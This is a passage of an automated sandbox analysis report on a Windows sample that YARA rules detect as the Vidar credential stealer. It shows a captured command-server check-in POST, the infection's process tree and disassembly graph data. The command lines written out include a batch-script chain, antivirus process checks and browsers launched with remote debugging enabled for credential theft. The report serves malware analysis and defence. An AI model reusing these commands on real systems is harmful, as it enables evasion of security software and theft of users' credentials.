                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:17 UTC1697OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 48 4c 4e 4f 48 44 4a 4d 59 55 41 41 31 44 54 30 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 52 39 48 4c 4e 4f 48 44 4a 4d 59 55 41 41 31 44 54 30 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 52 39 48 4c 4e 4f 48 44 4a 4d 59 55 41 41 31 44 54 30 48 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------R9HLNOHDJMYUAA1DT0HLContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------R9HLNOHDJMYUAA1DT0HLContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------R9HLNOHDJMYUAA1DT0HLCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:01:09:11
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\din.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:1'224'479 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CE76B7CDA29A7EA80917E5844A7FCA42
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                      Start time:01:09:12
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd
                                                                                                                                                                                                                                                                                      Imagebase:0x410000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                      Start time:01:09:12
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                      Start time:01:09:13
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                                                      Imagebase:0xba0000
                                                                                                                                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                      Start time:01:09:13
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                      Start time:01:09:13
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                                                                                                                                      Imagebase:0xba0000
                                                                                                                                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                      Start time:01:09:13
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                                      Start time:01:09:14
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:cmd /c md 322891
                                                                                                                                                                                                                                                                                      Imagebase:0x410000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                                                      Start time:01:09:14
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:findstr /V "cache" Bulgaria
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                                                      Start time:01:09:14
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes I
                                                                                                                                                                                                                                                                                      Imagebase:0x410000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                      Start time:01:09:14
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:Centered.com I
                                                                                                                                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                                                                                                                                      File size:947'288 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                      Start time:01:09:15
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                      Imagebase:0xa60000
                                                                                                                                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                      Start time:03:05:06
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                      Start time:03:05:07
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                      Start time:03:05:21
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                                                      Start time:03:05:21
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                      Start time:03:05:21
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                      Start time:03:05:22
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                      Start time:03:05:26
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                      Start time:03:05:26
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:21%
                                                                                                                                                                                                                                                                                        Total number of Nodes:1482
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                        execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 